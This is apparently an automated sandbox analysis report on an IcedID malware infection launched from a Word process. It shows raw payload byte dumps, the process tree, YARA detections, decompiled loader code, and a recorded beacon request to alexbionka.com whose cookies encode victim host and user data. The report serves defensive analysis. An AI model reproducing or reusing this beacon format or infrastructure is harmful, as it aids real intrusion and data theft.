                                                Aug 11, 2022 17:27:53.262634039 CEST3INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                Data Ascii: H_IIHLD$T$:tHL$Hf;tD$($:tHIHsvIHD$
                                                Aug 11, 2022 17:27:53.262659073 CEST4INData Raw: 98 00 00 00 ae 00 00 00 c7 84 24 9c 00 00 00 05 00 00 00 e9 60 ff ff ff 81 84 24 84 00 00 00 a2 00 00 00 c7 84 24 88 00 00 00 0c 00 00 00 3a ff 74 00 83 84 24 88 00 00 00 21 c7 84 24 8c 00 00 00 00 00 00 00 66 3b ff 74 00 83 84 24 8c 00 00 00 4c
                                                Data Ascii: $`$$:t$!$f;t$L$f:t$$$$f;tD$hD$lf;D$`D$d:t5D$TD$X?f;tD$XD$\f;t#D$PTD$T:tD$d
                                                Aug 11, 2022 17:27:53.262682915 CEST6INData Raw: 00 00 00 83 c0 32 3a e4 74 d8 b8 34 00 00 00 83 c0 36 e9 37 03 00 00 b8 57 00 00 00 83 c0 0f 66 3b c9 74 0a 83 c0 44 66 89 44 24 60 eb dc 66 89 44 24 5e b8 29 00 00 00 3a f6 74 e8 b8 34 00 00 00 83 c0 37 66 3b e4 0f 84 7b ff ff ff 48 83 bc 24 a0
                                                Data Ascii: 2:t467Wf;tDfD$`fD$^):t47f;{H$t$u3H$_^:L$HT$pf;tH$$9L$pH$h:tH$`T$x$@m$D:t1$L
                                                Aug 11, 2022 17:27:53.262706995 CEST7INData Raw: 00 00 e9 6c fc ff ff 83 84 24 14 01 00 00 0a c7 84 24 18 01 00 00 25 00 00 00 66 3b ed 0f 84 74 ff ff ff 33 c0 48 81 c4 48 02 00 00 e9 11 fb ff ff 8b 44 24 30 ff c0 e9 96 02 00 00 33 c0 eb e5 48 c7 84 24 98 00 00 00 00 00 00 00 e9 80 00 00 00 48
                                                Data Ascii: l$$%f;t3HHD$03H$H$t$uAXA\HAAHHHIV!IH3H|$xu!H$H$uf;t3aD$xHD$pR$
                                                Aug 11, 2022 17:27:53.262732029 CEST8INData Raw: 00 00 00 66 3b ff 74 00 c7 84 24 d8 00 00 00 16 00 00 00 83 84 24 d8 00 00 00 40 eb b8 c7 84 24 c4 00 00 00 c0 00 00 00 81 84 24 c4 00 00 00 85 00 00 00 3a f6 74 17 c7 84 24 c0 00 00 00 32 03 00 00 83 84 24 c0 00 00 00 03 3a e4 74 cf c7 84 24 c8
                                                Data Ascii: f;t$$@$$:t$2$:t$.$f;t$$:f;t/$%$f;t$A$:t$$:Af;t-H$P:tD
                                                Aug 11, 2022 17:27:53.262754917 CEST10INData Raw: 00 81 84 24 ec 00 00 00 de 00 00 00 3a ff 74 79 c7 84 24 e0 00 00 00 90 02 00 00 83 84 24 e0 00 00 00 6d 3a ed 74 4a c7 84 24 f8 00 00 00 52 00 00 00 83 84 24 f8 00 00 00 04 3a c0 74 17 c7 84 24 f4 00 00 00 02 00 00 00 83 84 24 f4 00 00 00 16 3a
                                                Data Ascii: $:ty$$m:tJ$R$:t$$:t$$of;X$$f;t$P$f;t$($f;9D$@0D$@:tYD$`D$`T$D$HD$Ho:tD
                                                Aug 11, 2022 17:27:53.262779951 CEST11INData Raw: 24 d8 00 00 00 ae 00 00 00 c7 84 24 dc 00 00 00 05 00 00 00 eb 97 83 84 24 c8 00 00 00 21 c7 84 24 cc 00 00 00 00 00 00 00 3a c9 74 00 83 84 24 cc 00 00 00 4c c7 84 24 d0 00 00 00 66 00 00 00 66 3b c9 0f 84 48 ff ff ff 81 84 24 d4 00 00 00 b3 00
                                                Data Ascii: $$$!$:t$L$ff;H$$:t$$f;d$z$\f;t3HL$8f;tT$hHL$@:t$HL$8T$`:tD$0AHD$@HD$ >u3
                                                Aug 11, 2022 17:27:53.262804031 CEST12INData Raw: c7 84 24 fc 00 00 00 12 00 00 00 3a c0 74 cf 81 84 24 04 01 00 00 8b 00 00 00 c7 84 24 08 01 00 00 16 00 00 00 e9 52 ff ff ff 83 84 24 e0 00 00 00 2d c7 84 24 e4 00 00 00 41 00 00 00 66 3b c0 0f 84 4e ff ff ff 83 84 24 f0 00 00 00 03 c7 84 24 f4
                                                Data Ascii: $:t$$R$-$Af;N$$:K$$:tH&I%HXIIcIIIL#HIH$P$Tf;t$T$X$<
                                                Aug 11, 2022 17:27:53.262897015 CEST14INData Raw: 58 88 44 24 20 48 8b 44 24 30 66 3b d2 74 3d 41 83 c0 0f 33 d2 3a d2 74 d7 48 8b c1 8a 00 66 3b db 74 de 48 8b 8c 24 88 00 00 00 4c 8b 01 e9 34 fe ff ff 8a 4c 24 21 e8 d6 01 00 00 e9 8a 01 00 00 48 8b c1 8a 40 01 66 3b ff 74 97 48 8b 4c 24 38 48
                                                Data Ascii: XD$ HD$0f;t=A3:tHf;tH$L4L$!H@f;tHL$8Hf;tkH@`uH|$(rAHD$(HwHxHD$0HD$(IHIHdHD$0HLHI"I_IHfI\IM3M_HAUHA]
                                                Aug 11, 2022 17:27:53.366070986 CEST15INData Raw: f7 d4 8b 44 24 04 89 44 24 08 eb 35 c3 41 50 41 ff d6 49 81 c3 07 06 00 00 48 25 54 03 00 00 4d 0f a4 f5 59 48 81 e5 a4 11 00 00 49 f7 fb 49 ff c1 53 4c 87 d9 e4 9a c3 49 13 e3 48 f7 f4 4c 03 c1 8b 44 24 08 48 83 c4 18 e9 67 ff ff ff 8b 04 24 89
                                                Data Ascii: D$D$5APAIH%TMYHIISLIHLD$Hg$D$Hm"H3HHPHHHIHI6!IIHHM#9D$49D$,}:D$$D$8xgHPHMiIIIMAII


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                1192.168.2.224917264.227.108.2780C:\Windows\System32\rundll32.exe
                                                TimestampkBytes transferredDirectionData
                                                Aug 11, 2022 17:28:05.028685093 CEST379OUTGET / HTTP/1.1
                                                Connection: Keep-Alive
                                                Cookie: __gads=3570055661:1:5038:57; _gat=6.1.7601.64; _ga=1.329303.0.5; _u=323130393739:416C627573:30423335313032443133344136373743; __io=0; _gid=67AFEDC5AC03
                                                Host: alexbionka.com
                                                Aug 11, 2022 17:28:05.683288097 CEST379INHTTP/1.1 404 Not Found
                                                Server: nginx
                                                Date: Thu, 11 Aug 2022 15:28:05 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                Data Raw: 31 30 63 0d 0a 09 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 09 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 09 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 09 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 09 3c 68 72 3e 0a 09 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 61 6c 65 78 62 69 6f 6e 6b 61 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 09 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: 10c<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at alexbionka.com Port 80</address></body></html>0


                                                Statistics

                                                CPU Usage

                                                Click to jump to process

                                                Memory Usage

                                                Click to jump to process

                                                High Level Behavior Distribution

                                                Click to dive into process behavior distribution

                                                Behavior

                                                Click to jump to process

                                                System Behavior

                                                General

                                                Target ID:0
                                                Start time:17:27:17
                                                Start date:11/08/2022
                                                Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                Wow64 process (32bit):false
                                                Commandline:"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
                                                Imagebase:0x13f220000
                                                File size:1423704 bytes
                                                MD5 hash:9EE74859D22DAE61F1750B3A1BACB6F5
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high

                                                General

                                                Target ID:4
                                                Start time:17:27:28
                                                Start date:11/08/2022
                                                Path:C:\Users\user\AppData\Local\Temp\r8F8A.tmp.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Users\user\AppData\Local\Temp\r8F8A.tmp.exe" "C:\Users\user\AppData\Local\Temp\y84FE.tmp.dll",#1
                                                Imagebase:0x40000
                                                File size:44544 bytes
                                                MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Antivirus matches:
                                                • Detection: 0%, Metadefender, Browse
                                                • Detection: 0%, ReversingLabs
                                                Reputation:high

                                                General

                                                Target ID:5
                                                Start time:17:27:29
                                                Start date:11/08/2022
                                                Path:C:\Windows\System32\rundll32.exe
                                                Wow64 process (32bit):false
                                                Commandline:"C:\Users\user\AppData\Local\Temp\r8F8A.tmp.exe" "C:\Users\user\AppData\Local\Temp\y84FE.tmp.dll",#1
                                                Imagebase:0xffbd0000
                                                File size:45568 bytes
                                                MD5 hash:DD81D91FF3B0763C392422865C9AC12E
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: Windows_Trojan_IcedID_0b62e783, Description: unknown, Source: 00000005.00000002.946706838.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Author: unknown
                                                • Rule: Windows_Trojan_IcedID_91562d18, Description: unknown, Source: 00000005.00000002.946706838.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Author: unknown
                                                • Rule: Windows_Trojan_IcedID_48029e37, Description: unknown, Source: 00000005.00000002.946706838.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Author: unknown
                                                • Rule: Windows_Trojan_IcedID_11d24d35, Description: unknown, Source: 00000005.00000002.946709887.0000000180004000.00000002.00001000.00020000.00000000.sdmp, Author: unknown
                                                • Rule: JoeSecurity_IcedID_6, Description: Yara detected IcedID, Source: 00000005.00000002.946534785.000000000045E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_IcedID_1, Description: Yara detected IcedID, Source: 00000005.00000002.946534785.000000000045E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_IcedID_11d24d35, Description: unknown, Source: 00000005.00000002.946534785.000000000045E000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                • Rule: Windows_Trojan_IcedID_0b62e783, Description: unknown, Source: 00000005.00000002.946534785.000000000045E000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                • Rule: Windows_Trojan_IcedID_91562d18, Description: unknown, Source: 00000005.00000002.946534785.000000000045E000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                • Rule: Windows_Trojan_IcedID_48029e37, Description: unknown, Source: 00000005.00000002.946534785.000000000045E000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                Reputation:high

                                                Disassembly

                                                Code Analysis

                                                Call Graph

                                                • Entrypoint
                                                • Decryption Function
                                                • Executed
                                                • Not Executed
                                                • Show Help
                                                callgraph 1 Error: Graph is empty

                                                Module: __Unknown_Module_Name__

                                                Declaration
                                                LineContent
                                                Reset < >

                                                  Execution Graph

                                                  Execution Coverage:20.8%
                                                  Dynamic/Decrypted Code Coverage:100%
                                                  Signature Coverage:16.2%
                                                  Total number of Nodes:315
                                                  Total number of Limit Nodes:7
                                                  execution_graph 1421 43e64 _except_handler4_common 1443 439d0 1444 439d2 1443->1444 1448 4398f 1443->1448 1445 429b3 9 API calls 1444->1445 1446 43a0e GetCurrentProcess IsWow64Process 1445->1446 1447 43a2c 1446->1447 1461 43b40 1446->1461 1449 43a38 GetNativeSystemInfo 1447->1449 1447->1461 1451 41189 4 API calls 1448->1451 1450 43a64 1449->1450 1454 43a88 GetSystemDirectoryW 1450->1454 1450->1461 1455 439cc 1451->1455 1452 41189 4 API calls 1453 43b54 1452->1453 1456 43aa2 1454->1456 1454->1461 1457 4384e 17 API calls 1456->1457 1458 43ab9 1457->1458 1459 43ac1 Wow64EnableWow64FsRedirection memset GetCommandLineW CreateProcessW 1458->1459 1458->1461 1460 43b12 Wow64EnableWow64FsRedirection WaitForSingleObject CloseHandle CloseHandle 1459->1460 1459->1461 1460->1461 1461->1452 1422 43fa1 1423 43f82 1422->1423 1425 43b77 1423->1425 1426 43bbe 1425->1426 1427 43be8 1426->1427 1428 43bc8 LoadLibraryExA 1426->1428 1434 43c82 DelayLoadFailureHook 1427->1434 1435 43c55 GetProcAddress 1427->1435 1437 43c46 1427->1437 1429 43c1e GetLastError 1428->1429 1430 43bd9 InterlockedCompareExchange 1428->1430 1432 43c2f InterlockedCompareExchange 1429->1432 1433 43c28 1429->1433 1430->1427 1431 43c13 FreeLibrary 1430->1431 1431->1427 1432->1427 1432->1437 1433->1432 1433->1434 1438 43c8d 1434->1438 1436 43c66 GetLastError 1435->1436 1435->1437 1436->1437 1437->1434 1437->1438 1438->1423 1462 43f93 1464 43f82 1462->1464 1463 43b77 8 API calls 1463->1464 1464->1462 1464->1463 1133 4178c 1151 41593 1133->1151 1135 41791 1136 4179d GetStartupInfoW 1135->1136 1137 417ce InterlockedCompareExchange 1136->1137 1138 41903 1137->1138 1139 417df 1137->1139 1138->1139 1140 41912 Sleep 1138->1140 1141 41922 _amsg_exit 1139->1141 1142 417ef 1139->1142 1140->1137 1146 4184c 1141->1146 1143 41824 _initterm 1142->1143 1144 4183f 1142->1144 1147 419aa 1142->1147 1143->1144 1145 41844 InterlockedExchange 1144->1145 1144->1146 1145->1146 1146->1147 1156 41203 HeapSetInformation NtSetInformationProcess lstrlenW LocalAlloc 1146->1156 1152 415bc GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 1151->1152 1153 4255f 1151->1153 1155 415fb 1152->1155 1153->1152 1154 41612 1153->1154 1154->1135 1155->1154 1157 41355 ExitProcess 1156->1157 1159 4125b 1156->1159 1158 4134c LocalFree 1158->1157 1159->1158 1183 41622 1159->1183 1162 41296 SetErrorMode 1189 41e56 GetFileAttributesW 1162->1189 1163 424cd 1245 43955 1163->1245 1172 412e8 1173 4133a LocalFree 1172->1173 1175 412f7 1172->1175 1176 421db 1172->1176 1231 4138b 1173->1231 1228 41467 RtlImageNtHeader 1175->1228 1236 4389e LoadStringW 1176->1236 1180 4130f 1181 41331 FreeLibrary 1180->1181 1182 4132a DestroyWindow 1180->1182 1181->1173 1182->1181 1184 41642 1183->1184 1187 4165b 1184->1187 1253 43fad lstrlenW lstrlenW 1184->1253 1186 41285 1186->1158 1186->1162 1186->1163 1187->1186 1249 41733 1187->1249 1190 4233b SearchPathW 1189->1190 1196 41e93 1189->1196 1191 41ea9 lstrlenW 1190->1191 1199 41fc6 1190->1199 1191->1196 1193 412b1 1203 419e3 1193->1203 1194 41eee GetFileAttributesW 1194->1196 1197 42618 CreateActCtxW 1194->1197 1195 41f16 CreateActCtxW 1195->1196 1198 41f3e CreateActCtxW 1195->1198 1196->1190 1196->1191 1196->1194 1196->1195 1196->1199 1197->1196 1198->1199 1200 41f58 CreateActCtxW 1198->1200 1256 41189 1199->1256 1200->1196 1201 41f76 1200->1201 1201->1199 1202 41fa9 CreateActCtxW 1201->1202 1202->1199 1259 41a33 NtOpenProcessToken 1203->1259 1205 412ba 1205->1176 1211 41b87 1205->1211 1209 42108 NtOpenProcessToken 1209->1205 1210 42121 NtSetInformationToken NtClose 1209->1210 1210->1205 1273 414bd LoadLibraryExW 1211->1273 1214 41bf5 1214->1172 1215 41bb6 1287 41c02 1215->1287 1218 42494 1220 4389e 8 API calls 1218->1220 1219 41bd3 1221 41be3 1219->1221 1223 42188 lstrlenW WideCharToMultiByte LocalAlloc 1219->1223 1222 424a7 FreeLibrary 1220->1222 1221->1214 1222->1172 1224 421bd WideCharToMultiByte 1223->1224 1225 4247f 1223->1225 1224->1221 1226 4389e 8 API calls 1225->1226 1227 4248f 1226->1227 1227->1222 1229 412ff 1228->1229 1230 413b9 LoadIconW LoadCursorW RegisterClassW CreateWindowExW 1229->1230 1230->1180 1232 41396 1231->1232 1233 413b0 1231->1233 1234 413a7 ReleaseActCtx 1232->1234 1235 4139c DeactivateActCtx 1232->1235 1233->1158 1234->1233 1235->1234 1237 4393f 1236->1237 1238 438e8 1236->1238 1240 41189 4 API calls 1237->1240 1417 42ccf 1238->1417 1242 4394c 1240->1242 1242->1163 1243 43913 LoadStringW 1243->1237 1244 43927 MessageBoxW 1243->1244 1244->1237 1248 43979 1245->1248 1246 41189 4 API calls 1247 424dd 1246->1247 1247->1158 1248->1246 1250 4173b 1249->1250 1251 41758 1250->1251 1252 4174f CharNextW 1250->1252 1251->1186 1252->1250 1254 43fd2 CompareStringW 1253->1254 1255 43fea 1253->1255 1254->1255 1255->1184 1257 41195 1256->1257 1258 43e89 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 1256->1258 1257->1193 1258->1193 1260 41a55 1259->1260 1261 419fc 1259->1261 1269 41a8c NtQueryInformationToken 1260->1269 1261->1205 1265 420b4 1261->1265 1264 41a79 1264->1261 1266 420cc 1265->1266 1268 41a14 1265->1268 1267 420d2 QueryActCtxW 1266->1267 1266->1268 1267->1268 1268->1205 1268->1209 1270 41ac2 1269->1270 1272 41a69 NtClose 1269->1272 1271 42362 NtQueryInformationToken 1270->1271 1270->1272 1271->1272 1272->1261 1272->1264 1274 423fc GetLastError 1273->1274 1275 414fb RtlImageNtHeader 1273->1275 1276 4240b 1274->1276 1284 42411 1274->1284 1277 41506 1275->1277 1286 41519 1275->1286 1297 439e5 1276->1297 1280 41511 SetProcessDEPPolicy 1277->1280 1277->1286 1279 42454 FormatMessageW 1282 42462 1279->1282 1279->1286 1280->1286 1281 41189 4 API calls 1283 4152c 1281->1283 1285 4389e 8 API calls 1282->1285 1283->1214 1283->1215 1284->1279 1284->1286 1285->1286 1286->1281 1288 41c1a 1287->1288 1292 41bc8 1287->1292 1289 41c24 lstrlenW LocalAlloc 1288->1289 1290 42396 _wtoi GetProcAddress 1288->1290 1291 41c46 WideCharToMultiByte 1289->1291 1289->1292 1290->1292 1293 41c86 LocalFree 1291->1293 1294 41c5e lstrlenA GetProcAddress 1291->1294 1292->1218 1292->1219 1293->1292 1294->1293 1295 42147 GetProcAddress 1294->1295 1295->1293 1296 42164 GetProcAddress 1295->1296 1296->1293 1298 43a02 1297->1298 1314 429b3 CreateFileW 1298->1314 1301 43b45 1305 41189 4 API calls 1301->1305 1302 43a2c 1302->1301 1303 43a38 GetNativeSystemInfo 1302->1303 1304 43a64 1303->1304 1304->1301 1307 43a88 GetSystemDirectoryW 1304->1307 1306 43b54 1305->1306 1306->1284 1307->1301 1308 43aa2 1307->1308 1324 4384e 1308->1324 1311 43ac1 Wow64EnableWow64FsRedirection memset GetCommandLineW CreateProcessW 1311->1301 1312 43b12 Wow64EnableWow64FsRedirection WaitForSingleObject CloseHandle CloseHandle 1311->1312 1312->1301 1313 43b40 1312->1313 1313->1301 1315 429f0 ReadFile 1314->1315 1316 42a4f 1314->1316 1317 42a47 CloseHandle 1315->1317 1318 42a09 1315->1318 1319 41189 4 API calls 1316->1319 1317->1316 1318->1317 1320 42a14 SetFilePointer 1318->1320 1321 42a5e GetCurrentProcess IsWow64Process 1319->1321 1320->1317 1322 42a25 ReadFile 1320->1322 1321->1301 1321->1302 1322->1317 1323 42a3d 1322->1323 1323->1317 1327 4385b 1324->1327 1326 43894 1326->1301 1326->1311 1328 435ff 1327->1328 1329 43699 1328->1329 1332 43647 1328->1332 1330 41189 4 API calls 1329->1330 1331 43845 1330->1331 1331->1326 1332->1329 1333 43667 1332->1333 1335 43702 LocalAlloc 1332->1335 1338 43722 1332->1338 1333->1329 1334 4368d LocalFree 1333->1334 1334->1329 1336 43718 1335->1336 1335->1338 1336->1333 1337 43816 1363 43168 1337->1363 1342 4374a 1338->1342 1347 427df 1338->1347 1341 4382d 1341->1326 1342->1333 1342->1337 1343 43765 1343->1333 1350 42e8f 1343->1350 1345 43761 1345->1333 1345->1342 1345->1343 1354 430e5 1345->1354 1348 427f5 iswalpha 1347->1348 1349 427f1 1347->1349 1348->1349 1349->1345 1351 42e9b 1350->1351 1353 42ec8 1351->1353 1377 42a67 1351->1377 1353->1342 1355 430f3 1354->1355 1358 43133 1354->1358 1355->1358 1391 42fd3 1355->1391 1358->1343 1359 43137 1361 42fb6 2 API calls 1359->1361 1360 4312e 1398 42fb6 1360->1398 1361->1358 1364 4318a 1363->1364 1365 4320e 1364->1365 1366 431de 1364->1366 1374 4319d 1364->1374 1368 43253 iswalpha 1365->1368 1369 43229 iswalpha 1365->1369 1367 42a67 2 API calls 1366->1367 1376 431ff 1367->1376 1370 4323d 1368->1370 1369->1370 1372 42a67 2 API calls 1370->1372 1370->1376 1371 432f5 wcschr 1371->1376 1372->1376 1374->1341 1375 42da5 iswalpha iswalpha 1375->1376 1376->1371 1376->1374 1376->1375 1411 42b88 1376->1411 1378 42a83 1377->1378 1379 42b2f 1378->1379 1380 42ab8 1378->1380 1382 42b15 1378->1382 1379->1353 1380->1379 1387 42748 1380->1387 1382->1379 1384 4271a 1382->1384 1385 42724 memset 1384->1385 1386 4273d 1384->1386 1385->1386 1386->1379 1388 42756 1387->1388 1389 4277b memset 1388->1389 1390 42799 1388->1390 1389->1390 1390->1379 1392 42fe5 1391->1392 1395 43032 1391->1395 1393 4300b wcschr 1392->1393 1392->1395 1396 43075 1392->1396 1394 43022 wcschr 1393->1394 1393->1395 1394->1395 1395->1358 1395->1359 1395->1360 1396->1395 1397 430ac iswalpha 1396->1397 1397->1395 1401 42f29 1398->1401 1402 42f35 1401->1402 1403 42f64 1402->1403 1405 42da5 1402->1405 1403->1358 1406 42db8 1405->1406 1410 42de7 1405->1410 1407 42dc4 iswalpha 1406->1407 1406->1410 1408 42dd7 1407->1408 1409 42e41 iswalpha 1408->1409 1408->1410 1409->1410 1410->1403 1415 42ba7 1411->1415 1412 42c99 1412->1376 1413 42be0 1413->1412 1414 42748 memset 1413->1414 1414->1412 1415->1412 1415->1413 1416 4271a memset 1415->1416 1416->1413 1418 42cdd 1417->1418 1419 42cee _vsnwprintf 1418->1419 1420 42d0f 1418->1420 1419->1420 1420->1237 1420->1243 1465 41c9c 1466 41cae 1465->1466 1470 42521 1466->1470 1475 41d5e GetModuleHandleA 1466->1475 1468 41cf0 __set_app_type __p__fmode __p__commode 1469 41d28 1468->1469 1471 41d35 1469->1471 1472 4252e __setusermatherr 1469->1472 1470->1472 1477 41d46 _controlfp 1471->1477 1474 41d3a 1476 41d6f 1475->1476 1476->1468 1477->1474 1439 43cef 1440 43d2c 1439->1440 1441 43d01 1439->1441 1441->1440 1442 43d26 ?terminate@ 1441->1442 1442->1440 1478 41979 1479 41995 1478->1479 1480 4198e _exit 1478->1480 1481 4199d _cexit 1479->1481 1482 419a3 1479->1482 1480->1479 1481->1482 1486 4119b 1487 421f8 GetWindowLongW 1486->1487 1493 411cd 1486->1493 1488 4220c GetWindow 1487->1488 1487->1493 1492 42222 memset GetClassNameW 1488->1492 1488->1493 1489 411d7 DefWindowProcW 1491 411ef 1489->1491 1490 422f4 1494 42305 SetWindowLongW 1490->1494 1495 422fb SetClassLongW 1490->1495 1496 41189 4 API calls 1491->1496 1497 42254 CompareStringW 1492->1497 1498 4227a GetWindow 1492->1498 1493->1489 1493->1490 1494->1491 1495->1494 1499 411fa 1496->1499 1497->1498 1500 42273 GetWindow 1497->1500 1498->1493 1501 42287 GetWindowLongW 1498->1501 1500->1498 1501->1493 1502 42296 GetClassLongW 1501->1502 1502->1493 1503 422a5 GetClassLongW SetWindowLongW SetClassLongW 1502->1503 1503->1493 1504 43f7b 1505 43f82 1504->1505 1506 43b77 8 API calls 1505->1506 1506->1505

                                                  Callgraph

                                                  • Executed
                                                  • Not Executed
                                                  • Opacity -> Relevance
                                                  • Disassembly available
                                                  callgraph 0 Function_00042E84 1 Function_00041B87 3 Function_00041C02 1->3 22 Function_0004389E 1->22 41 Function_000414BD 1->41 2 Function_00042001 21 Function_00041B1D 2->21 49 Function_00042042 2->49 4 Function_00041203 4->1 14 Function_0004138B 4->14 4->22 30 Function_00041622 4->30 43 Function_000413B9 4->43 44 Function_00041444 4->44 57 Function_00043955 4->57 58 Function_00041E56 4->58 69 Function_00041467 4->69 71 Function_00041AE1 4->71 72 Function_000419E3 4->72 5 Function_00041E0C 6 Function_00041A8C 7 Function_0004178C 7->4 7->5 18 Function_00041593 7->18 45 Function_00043DC5 7->45 56 Function_000419CA 7->56 73 Function_00041763 7->73 8 Function_00042E8F 68 Function_00042A67 8->68 9 Function_00042B88 11 Function_00042689 9->11 9->21 24 Function_0004271A 9->24 54 Function_00042748 9->54 65 Function_000426E4 9->65 10 Function_00041189 12 Function_00043E0B 13 Function_0004158B 15 Function_00042815 16 Function_00041D96 16->5 16->56 17 Function_00042890 19 Function_00043F93 80 Function_00043B77 19->80 20 Function_00041C9C 20->13 46 Function_00041D46 20->46 61 Function_00041D5E 20->61 22->10 53 Function_00042CCF 22->53 23 Function_00043E1F 23->56 25 Function_00043F9A 25->80 26 Function_0004119B 26->10 27 Function_00042DA5 27->15 32 Function_00042D2E 27->32 74 Function_00042963 27->74 28 Function_00042F20 29 Function_00043FA1 29->80 31 Function_00043FAD 30->31 40 Function_00041733 30->40 32->15 32->74 33 Function_00042F29 33->27 34 Function_000420B4 35 Function_000419B5 35->56 36 Function_00042FB6 36->33 37 Function_000419B1 38 Function_000429B3 38->10 39 Function_00041A33 39->6 41->10 41->22 66 Function_000439E5 41->66 42 Function_0004253F 45->5 48 Function_00043D42 45->48 45->56 81 Function_00043D7C 45->81 47 Function_000426C6 79 Function_00042077 49->79 50 Function_00042543 50->56 51 Function_00043E4C 52 Function_0004384E 52->15 52->32 82 Function_000435FF 52->82 55 Function_000428C9 55->17 57->10 58->2 58->10 58->71 59 Function_000439D0 59->10 59->38 59->52 60 Function_00042FD3 60->15 60->32 60->74 61->16 62 Function_0004155F 63 Function_000427DF 64 Function_00043E64 65->47 66->10 66->38 66->52 67 Function_000430E5 67->36 67->60 67->71 68->21 68->24 68->54 68->65 70 Function_00041460 71->21 72->34 72->39 74->15 74->55 75 Function_0004286E 76 Function_00043CEF 77 Function_00043168 77->9 77->15 77->27 77->32 77->68 77->71 77->75 78 Function_00043F68 82->8 82->10 82->63 82->67 82->71 82->77 83 Function_00041578 84 Function_00041979 84->56 85 Function_00043F7B 85->80

                                                  Executed Functions

                                                  Function 00041203 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 125memorystringnativeCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  C-Code - Quality: 94%
                                                  			E00041203(char _a4, WCHAR* _a12, intOrPtr _a16) {
				int _v8;
				int _v12;
				char _v16;
				void* _v20;
				void _v24;
				signed int _v28;
				char _v32;
				char _v36;
				intOrPtr _v40;
				void* _t46;
				void* _t51;
				intOrPtr _t64;
				void* _t65;
				void* _t69;
				void* _t72;
				void* _t73;
				struct HWND__* _t77;

				_t71 = 1;
				__imp__HeapSetInformation(0, 1, 0, 0);
				_v24 = 1;
				NtSetInformationProcess(0xffffffff, 0x22,  &_v24, 4); // executed
				_t76 = lstrlenW(_a12) + 1;
				 *0x4504c = _a4;
				_t46 = LocalAlloc(0x40, lstrlenW(_a12) + 1 + _t76);
				_v20 = _t46;
				if(_t46 == 0) {
					L13:
					ExitProcess(0);
				}
				if(E00041AE1(_t46, _t76, _a12) >= 0 && E00041622(_t76, _v20,  &_v28,  &_a4,  &_v32,  &_a12) != 0) {
					_t81 = _v28 & 1;
					if((_v28 & 1) != 0) {
						E00043955(_a4, _a12);
					} else {
						SetErrorMode(0x8001); // executed
						_v16 = 0;
						_t64 = E00041E56(_t72, _a4,  &_v16, 1); // executed
						_v40 = _t64;
						_t65 = E000419E3(_t72, _t81, _t64); // executed
						_t82 = _t65;
						if(_t65 == 0) {
							_t51 = E0004389E(_t73,  *0x4504c, 0x403, _a4, L"requestedRunLevel");
						} else {
							_v12 = 0;
							_v8 = 0;
							_t69 = E00041B87(_t73, _t82,  *0x4504c, _a4, _v32, _a12,  &_v8,  &_v36,  &_v12); // executed
							_t71 = _v12;
							if(_t69 != 0) {
								if(_t71 != 0) {
									_a12 = _t71;
								}
								E00041467(_t72, _v8);
								_t77 = E000413B9( *0x4504c, L"RunDLL");
								E00041444(_v36, _t77,  *0x4504c, _a12, _a16);
								if(_t77 != 0) {
									DestroyWindow(_t77);
								}
								FreeLibrary(_v8);
							}
							_t51 = LocalFree(_t71);
						}
						E0004138B(_t51, _v40, _v16);
					}
				}
				LocalFree(_v20);
				goto L13;
			}




















                                                  0x00041214
                                                  0x00041217
                                                  0x00041227
                                                  0x0004122a
